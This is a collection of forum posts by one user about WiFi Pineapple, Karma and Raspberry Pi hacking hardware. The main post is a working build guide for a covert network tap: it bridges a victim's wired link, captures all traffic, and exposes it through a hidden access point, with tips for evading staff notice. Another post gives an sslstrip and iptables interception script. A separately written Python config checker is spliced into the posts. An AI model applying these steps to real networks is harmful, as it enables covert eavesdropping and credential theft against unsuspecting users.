Posts posted by telot
-
Haha - I'm laughing more at the tinfoil lining some poor guy's outside-facing walls...but the paint thing is awesome! I've heard of it being used in R&D environments, but I thought it was outside the reach of your average consumer. After a quick Google, the stuff is pricey but still doable. http://www.slt.co/products/RFShieldingPaint/ShieldingPaint-YShield-HSF54.aspx
telot
-
Mr-Protocol: For sure. I'm still waiting with bated breath for Seb to release a new firmware with interceptor support (it's been talked about since the mark4 came out, but I'm still hopeful).
inTheDMZ: I got Karma going as well on a previous project with the pi - digininja's guide was pretty easy to follow. I decided to go with the NHA for my pi-karma as well as this interceptor version. The card is just robust and awesome and wireless-N. I've left Karma off this build so far, because I ran out of time, and I'm not sure it's a feature that everyone would want with a device like this. Karma is something that a good (or even semi-good) sysadmin would notice over time, and bringing attention to your wireless/wired network tap is probably not a good idea. Regardless, I'll still build it in so the option is there for people.
Cheers
telot
-
The Interceptor has long been kind of a dead project. It makes sense too. The fon+, the hardware Robin Wood originally wrote his interceptor code for, is way past EOL, hard to find, and under-featured given the current landscape of embedded/SOC offerings. By borrowing some of irongeek's raspberry pi recipes, and adding in some pi-point, I was able to get very similar functionality out of my raspberry pi. Here's how.
Hardware:
Raspberry Pi Model B
32GB SD Card
Belkin 4 port powered USB hub
Alfa wifi card (NHA, from the hakshop)
USB Ethernet adapter (also from the hakshop)
OS:
Latest image of Raspbian
Software: All can be apt-get installed
bridge-utils
tcpdump
hostapd
fkill
hostapd
zd1211-firmware
hostap-utils
iw
dnsmasq
Edit /etc/network/interfaces to look like this:
auto lo
iface lo inet loopback

iface eth0 inet dhcp

iface wlan0 inet static
    address 192.168.0.1
    netmask 255.255.255.0
Edit /etc/dnsmasq.conf
# Never forward plain names (without a dot or domain part)
domain-needed
# Only listen for DHCP on wlan0
interface=wlan0
# Create a dhcp range on your /24 wlan0 network with 12 hour lease time
dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h
Edit /etc/hostapd/hostapd.conf (notice it is wpa with the preshared key at /etc/hostapd-psk - the ssid is also hidden)
interface=wlan0
driver=nl80211
ssid=monkey
channel=1
auth_algs=1
wpa=1
wpa_psk_file=/etc/hostapd-psk
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP TKIP
rsn_pairwise=CCMP
ignore_broadcast_ssid=1
Next Create/edit /etc/hostapd-psk
00:00:00:00:00:00 YourSuperLongAndSecurePasswd
We're all set! Below you'll see my script for the intercepting portion of the monkey. Feel free to put it in /etc/rc.local to make it run on boot up.
#!/bin/bash
# Change settings below to match network
eth_ip="192.168.1.199"
eth_netmask="255.255.255.0"
eth_broadcast="192.168.1.255"
brctl addbr mybridge
brctl addif mybridge eth0
brctl addif mybridge eth1
ifconfig eth0 0.0.0.0 promisc up
ifconfig eth1 0.0.0.0 promisc up
ifconfig mybridge promisc up
ifconfig mybridge $eth_ip netmask $eth_netmask broadcast $eth_broadcast
tcpdump -i eth1 -w /root/cap.pcap &
And here is my script for the wifi access point portion of the monkey, again you can put it in rc.local
# turn on forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# enable NAT
iptables -t nat -A POSTROUTING -j MASQUERADE
# start the access point
hostapd -B /etc/hostapd/hostapd.conf
Now you're passing along all wired traffic to and from your wired victim, all whilst capturing every packet that goes by. You can then surreptitiously nab the pcap via the hidden wifi AP.
What it doesn't do:
Unlike the interceptor, it doesn't clone the traffic and pipe it over wifi and/or vpn. It merely captures the traffic and stores it for later retrieval. This was necessary with the original fon+, because there was no usb port, and only a dozen or so MB of storage. Now with USB and storage cheaper than ever, you can store days/weeks/months of captures if you want.
Things to add:
-Cronjob that will only turn on the wifi at certain times such as after business hours. That way no employee who happens to be chilling with airodump-ng running notices anything odd.
-Cronjob that changes the wifi card from master mode to managed and connects to a wifi access point as a client to securely send the cap files. In doing so you could also send an email/upload a status file.
-Add Jasager functionality to the wifi AP (this one's the biggie)
-Add the all important sslstrip functionality (something I've tried but can't get to work - if there's interest, I'll happily share my findings)
-Add in Moriarty's awesome new UWUI
So that's it! I've been testing this for the last several hours and it works great. Hope you guys find this interesting enough to give it a try yourself and post your experience here.
Long live the interceptor monkey!
telot
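The three files in the build above (the static wlan0 stanza, dnsmasq's dhcp-range and hostapd's interface) only work when they agree with each other, and a mismatch is the usual reason a hand-built AP hands out no addresses or hands out the AP's own address. The checker below is an added example, not code from the post; it parses constructed copies of the posted snippets, reports any disagreement between them, and also flags the legacy settings (wpa=1, TKIP) that a reviewer would want changed before such a config is used anywhere but a lab. The parsing of /etc/network/interfaces is deliberately limited to "inet static" stanzas.

```python
"""Consistency and hygiene check for a hostapd + dnsmasq + /etc/network/interfaces AP.
Added example; the three sample inputs are constructed copies of the posted configs."""
import ipaddress
import re

# Constructed sample: /etc/network/interfaces (static wlan0 stanza from the post)
INTERFACES = """\
auto lo
iface lo inet loopback

iface eth0 inet dhcp

iface wlan0 inet static
    address 192.168.0.1
    netmask 255.255.255.0
"""

# Constructed sample: /etc/dnsmasq.conf
DNSMASQ = """\
domain-needed
interface=wlan0
dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h
"""

# Constructed sample: /etc/hostapd/hostapd.conf (only the inspected keys are needed)
HOSTAPD = """\
interface=wlan0
driver=nl80211
ssid=monkey
wpa=1
wpa_pairwise=CCMP TKIP
ignore_broadcast_ssid=1
"""


def _store(result, iface, fields):
    """Record a finished 'inet static' stanza as an IPv4Interface."""
    if iface and "address" in fields and "netmask" in fields:
        result[iface] = ipaddress.IPv4Interface(f"{fields['address']}/{fields['netmask']}")


def parse_static_ifaces(text):
    """Return {iface: IPv4Interface} for every 'iface X inet static' stanza."""
    result, current, fields = {}, None, {}
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"iface\s+(\S+)\s+inet\s+(\S+)", line)
        if m:
            _store(result, current, fields)
            current = m.group(1) if m.group(2) == "static" else None
            fields = {}
        elif current and line and not line.startswith("#"):
            key, _, val = line.partition(" ")
            fields[key] = val.strip()
    _store(result, current, fields)
    return result


def parse_kv(text):
    """Parse key=value lines (hostapd/dnsmasq style); bare flags map to True."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, sep, val = line.partition("=")
            conf[key.strip()] = val.strip() if sep else True
    return conf


def check_ap_config(interfaces_text, dnsmasq_text, hostapd_text):
    """Return a list of disagreements between the three files; empty means consistent."""
    problems = []
    statics = parse_static_ifaces(interfaces_text)
    dns, ap = parse_kv(dnsmasq_text), parse_kv(hostapd_text)
    iface = ap.get("interface")
    if dns.get("interface") != iface:
        problems.append(f"dnsmasq listens on {dns.get('interface')} but hostapd uses {iface}")
    if iface not in statics:
        problems.append(f"{iface} has no static address in /etc/network/interfaces")
        return problems
    ap_addr, subnet = statics[iface], statics[iface].network
    parts = dns.get("dhcp-range", "").split(",")
    if len(parts) < 2:
        problems.append("dnsmasq has no usable dhcp-range")
        return problems
    start, end = ipaddress.IPv4Address(parts[0]), ipaddress.IPv4Address(parts[1])
    if start not in subnet or end not in subnet:
        problems.append(f"dhcp-range {start}-{end} is outside {subnet}")
    if start <= ap_addr.ip <= end:
        problems.append(f"AP address {ap_addr.ip} lies inside the dhcp-range")
    if len(parts) > 2 and re.fullmatch(r"\d+\.\d+\.\d+\.\d+", parts[2]):
        if ipaddress.IPv4Address(parts[2]) != subnet.netmask:
            problems.append(f"dhcp-range netmask {parts[2]} differs from {subnet.netmask}")
    return problems


def legacy_wifi_settings(hostapd_text):
    """Flag hostapd settings a reviewer would not accept outside a lab."""
    ap, warnings = parse_kv(hostapd_text), []
    if ap.get("wpa") != "2":
        warnings.append("wpa=1 enables WPA1; use wpa=2 (RSN only)")
    if "TKIP" in ap.get("wpa_pairwise", ""):
        warnings.append("TKIP is allowed as a pairwise cipher; restrict to CCMP")
    if ap.get("ignore_broadcast_ssid") == "1":
        warnings.append("hidden SSID is not a security control; clients still leak it in probes")
    return warnings


if __name__ == "__main__":
    print(check_ap_config(INTERFACES, DNSMASQ, HOSTAPD) or "configs agree")
    print("\n".join(legacy_wifi_settings(HOSTAPD)))
```

Run as-is it reports that the posted trio agrees with itself and lists the three legacy settings; swapping the dhcp-range for one that straddles the subnet or contains the AP's address makes check_ap_config return the corresponding findings, which is the failure mode worth catching before the files go onto an SD card.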
-
Just signed up for the webinar :) Thanks for the heads up on the freebie router!
telot
-
You're looking for the interceptor. See the hak5 video on it. Unfortunately the hardware is hard to find these days (fon+). Irongeek has some how-tos on his site on using a raspberry pi, which is the direction I would recommend if you've got one handy.
Otherwise the wifipineapple mark4 should be able to be used as such, but it will cease to act as a pineapple as far as I can tell, and instead be more like an interceptor. This has not been done before, so it will likely cause headaches, but what's awesome is you can share what you learn with the community and get mad bonus points!
telot
-
Not all the tools are available in apt. Many of them are, but not all (metasploit for example). BT is so popular because they've got all the dependencies, done all the tweaking, and worked through all the bugs for you. It's ready to roll, with nearly every tool available.
BT is based on Ubuntu, as you mentioned, so there is certainly nothing stopping you from loading what tools you'd like into Ubuntu. I certainly don't need every tool in backtrack, so I just pick and choose what I'm interested in. That said, I always keep a live disk and Backtrack VMs around just in case.
telot
-
Already got it going :) Now to figure out how to wire up a better switch that can be used with the case on it...
Thanks again midnitesnake
telot
-
Holy shit it's happened! Thanks midnitesnake!
Now to figure out how to upgrade my old duck...
telot
-
You are quite welcome skrite
In order to have backtrack see the alfa, you forward USB devices to the guest OS. Each virtualization suite will handle this differently, but they all have the feature.
To get a proper IP from your router (not NAT via your host) to the VM - simply set up bridge mode (at least that's what it's called in virtualbox) for your VM. That way you can scan as if you're on the network, just as your mba is.
telot
-
As a fellow mba owner, I can understand why ubuntu (or windows) dual booting is not ideal. OSX is highly optimized for Apple's hardware and vice versa. You sacrifice battery life and oftentimes driver efficiency by booting into anything but OSX. It's a tradeoff that 90% of consumers never have to deal with, as they just stay in OSX full time. With that in mind, I would recommend going with a virtual machine of backtrack or ubuntu if you need the tools, but for the most part I just do like you were saying and use the terminal and wireshark in OSX.
The other downside to going with Apple is that it doesn't work great with the pineapple's ICS (as you saw from the link from an inebriated Mr-Protocol), but it is workable.
These are all tradeoffs we have to make in order to enjoy a great, if not the greatest, laptop.
telot
-
DrDinosaur - I believe Darren was using mdk3 for his occupineapple stuff. I can't really remember the details, but I'm a command line guy myself, so if you ssh into the pineapple, you can use these commands:
opkg update
opkg install mdk3
Then run the various mdk3 commands that Darren uses for the spoofing of a list of fake SSIDs.
pr0l3 - Have you read the pineapple book? See the pinned thread on these forums. If you're still having trouble, start a new thread and give all the details you can and I'm sure we'll be happy to help.
telot
-
It's been about a week since I last plugged this, so here's the usb card I use every day, all day long and with all types of power packs (5-12v batteries and usb port powered). I highly recommend it
http://www.supertalent.com/products/stt_usb_detail.php?type=Pico
Enjoy!
telot
-
Is there a reason you want to run all those separately? I'd take a look at running these alternate OS's in virtual machines. If you get the ODD adapter you're talking about, put the 500GB in there and then buy a SSD for your main OS, of which I'd recommend windows or a well suited distro of linux (not backtrack). Also throw in an 8GB stick of ram (super cheap) and you're set. Running backtrack and windows 7 at the same time, each with 2GB of ram, each pulling as much space as they want from the big old 500GB - all while leaving you with the same 4GB of ram you have now plus a new screaming SSD for your host OS. There's lots of advantages to this such as snapshots, not constantly rebooting to get into another OS, you can set up VLANs between your "victim" and "attacker" so you won't accidentally hack your roommates, etc.
telot
-
As I've now got Karma working on my raspberry pi, I'd love to see the UWUI ported to that :D
Doing a touch-optimized version for android tablets (even better - the n900!) might be fun and add some challenge for you as well. Thanks again for sharing this very nice tool with us Moriarty! Cheers!
telot
-
wychwood: Welcome to the pineapple community! We're always glad to have another pineappler added to our ranks.
Here is a link for a powered usb hub that I and other heavy users utilize everyday with great success:
http://www.newegg.com/Product/Product.aspx?Item=N82E16817394106&Tpk=F5U404PBLK
Perhaps the next iteration of pineapple hardware can be even more specialized and offer us 2 or 3 over-spec-powered usb ports...
telot
-
Hello all
I've been playing with my pineapple and my newly created raspberry pi running karma (all hail digininja!). Normally I test my karma'ing with my trusty "victim" laptop, but this time I decided to use my ipad instead. I couldn't help but notice that when I have sslstrip running, few apps are able to load, and when they do, there is usually some erratic behavior in the app. Either they sit and spin (loading animation) or just straight up fail (...Please check your network connection) or other bizarre behavior (facebook app on iphone says I have no friends when I go to my News Feed). This to me is quite the red flag raised to the vast majority of real world victims, who unless you're targeting a specific person's laptop with white/black lists, will no doubt be using a smartphone/tablet. With the proliferation of "post-pc" mobile devices, the lack of internet-connected-app support does not bode well for those of us who enjoy the benefits of sslstrip.
Anyone have any ideas on how I can fix this? It must be something in my sslstrip preparations/command that I can change right? Here is my usual "dump 'n strip" script that I run via wps button press.
#!/bin/sh
tcpdump -i eth0 -w /usb/cap.pcap -n net 172.16.42.0/24 &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
sslstrip -w /usb/sslstrip.log &
I know, the port 80 to 10000 is weird, but that's what was in the how-to sslstrip forum post and I've been using this script for 6 months and it works fabulous otherwise. Any help is much appreciated fellas, as always!
telot
-
And do the "Find the Pineapple" game Darren has mentioned before!
Next time we'll plan better
telot
-
Parity: I recently learned about this by way of Security Onion. I needed a way to sniff all my traffic in order to run snort and snorby and all these awesome intrusion detection tools (which work best by sniffing the entire networks traffic). For the most part, yes, you'll find these "span" ports on commercial, industry grade switches (mega $$$) but there is a cheap alternative. The company is kind of no-name (Mikrotik), but the product is totally sound. I've been using it for months and it works as advertised without fail.
http://www.roc-noc.c...rd/rb250gs.html
TheKingUnderTheHill: Another option is to sneak a passive lan tap in there. You can buy one of the two available on the hakshop, or you can build your own quite easily with some spare cat5 cable and some female ends, which you can pick up at home depot...hehe pick up some females at home depot...
telot
-
Also saw it at Derbycon - Mr. P probably heard me guffawing at the ridiculousness of it.
Hot chick, sure. Iphone taped to her hand as main plot driver, sure. Good hacker movie? Nuh Uh. No way. Sneakers, Hackers, War Games - now those are decent hacker movies.
telot
-
The way that I know is by using Airbase-ng - a tool found in the aircrack-ng suite. Vivek has some videos on using airbase in his wifi megaprimer on securitytube.net. There's pros and cons to using airbase over the pineapple (i.e. you can capture a wpa handshake with airbase). As cool as airbase is, I must warn you - it's not nearly as slick as the pineapple is. There's a lot of benefit to using specialized hardware for this task. As an example, you have to configure your own DHCP server if you want to use airbase effectively, whereas the pineapple of course is essentially all plug and play.
Since Mr. P didn't really answer this aspect of your question: the fon is another kind of wifi router that the karma/jasager was originally developed for by Mr. Robin Wood (aka digininja). Just google fon router and you'll find all the info you need about it.
Good Luck!
telot
-
Honestly, a wifipineapple might be a decent way to start. It's a great platform for getting your head around networking in general, sniffing traffic, deauthing (taking down an access point), phishing, and pranks. Watch the episodes on it and pore through the forums and wiki. Go back and read some old forums posts with lots of views and replies to see what problems and questions people have had.
telot
-
macbook air here - usb 3.0 works fine with virtual box running OSX as host
telot
-
odroid x2 might give you the oomph you're looking for petertfm, though multiple core support would be a must to get max benefit from it...
http://www.hardkernel.com/renewal_2011/products/prdt_info.php?g_code=G135235611947
The pi would be a good replacement as well - I've been using pwnpi to run my pineapple for months now and it works great. Use the pi when I need some horsepower (msf and set...though msf is pretty slow still) and use the pineapple solely for karmaing, stripping and dumping.
Either way, this UI is looking sicker and sicker - can we get some instructions for use on the pineapple Moriarty? I'm sure I can get it going, but with all this rummed up eggnog, I think getting step by step instructions would be most appreciated! lol
telot
-
For example:
scp -r -v OSXdir 172.16.42.1:/WP4dir/
so... scp -r -v /Users/chriswhat/Wp4Files/ 172.16.42.1:/usb/
telot
Pineapple Mark IV (Made in Home)
in WiFi Pineapple Mark IV
Posted · Edited by telot
1) Likely. Only red flag for me is the mobile version's usb devices. It depends how much amperage your usb hub is provided and thereby providing. Having two radios receiving/transmitting could cause intermittent issues if there is not enough power for the both of them.
2) Yes. Ethernet cable to PC. See Darren's wifi pineapple book for setting up the proper settings. You do not need POE. Power the AP1221U separately and connect your pc to the POE/LAN plug.
3) I'd do the pineapple myself. Remember when someone first broadcasts the SSIDs of known networks they're looking for, it's the strongest signal that wins.
4) No clue. I'd buy the one from the hakshop to be sure (and also support the team that made all this possible!).
telot